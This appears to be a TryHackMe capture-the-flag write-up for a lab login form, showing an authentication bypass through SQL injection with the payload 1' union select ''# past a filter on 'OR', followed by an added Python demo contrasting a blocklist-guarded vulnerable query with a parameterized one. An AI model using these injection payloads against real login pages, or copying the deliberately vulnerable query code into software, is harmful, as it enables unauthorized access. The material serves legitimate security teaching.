Saturday, 26 August 2023

Lesson Learned? TryHackMe Writeup


Scanning

We scan for open ports with nmap, running its default scripts and service version detection:


Enumeration

We access the website and see an authentication form:

We try guessing passwords, but that does not work:

We try login bypass techniques and find a SQL injection filter that blocks the "OR" keyword; the error message gives us a "hint" to use a technique that does not require "OR", so we are on the right track...

We find a post by Tib3rius on Twitter about SQL injection payloads that do not use "OR":

Exploitation

We try different payloads; with 1' union select ''# we successfully bypass the authentication and see the flag:
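As an added example (not code from the writeup or the room), the following Python snippet reproduces in miniature why the room's "OR" blocklist is not a fix: a union-based payload passes the filter and still changes the query, while a parameterized query binds the same input as plain data. It assumes a constructed users table in SQLite and, because SQLite has no '#' comment, the payload ends in '--' instead of the '#' used above.

```python
import re
import sqlite3

# Constructed in-memory database; the room's real schema and credentials are not on the page.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")

# The page's payload ends in '#', a MySQL comment; SQLite (used here so the
# example runs offline) comments with '--', so only the tail differs.
UNION_PAYLOAD = "1' union select ''--"
OR_PAYLOAD = "' OR '1'='1"


def contains_or(value: str) -> bool:
    """Hypothetical keyword blocklist like the one the room hints at: reject the word OR."""
    return re.search(r"\bor\b", value, re.IGNORECASE) is not None


def login_vulnerable(username: str, password: str) -> bool:
    """String-built query guarded only by the blocklist: input can still change the SQL."""
    if contains_or(username) or contains_or(password):
        return False  # the room's filter would show its 'hint' error here
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_hardened(username: str, password: str) -> bool:
    """Parameterized query: the input is bound as data, so no keyword filter is needed."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    print("vulnerable, OR payload   :", login_vulnerable(OR_PAYLOAD, "x"))     # False: blocked by filter
    print("vulnerable, union payload:", login_vulnerable(UNION_PAYLOAD, "x"))  # True: bypass succeeds
    print("hardened, union payload  :", login_hardened(UNION_PAYLOAD, "x"))    # False: treated as data
    print("hardened, real password  :", login_hardened("admin", "hunter2"))    # True: normal login
```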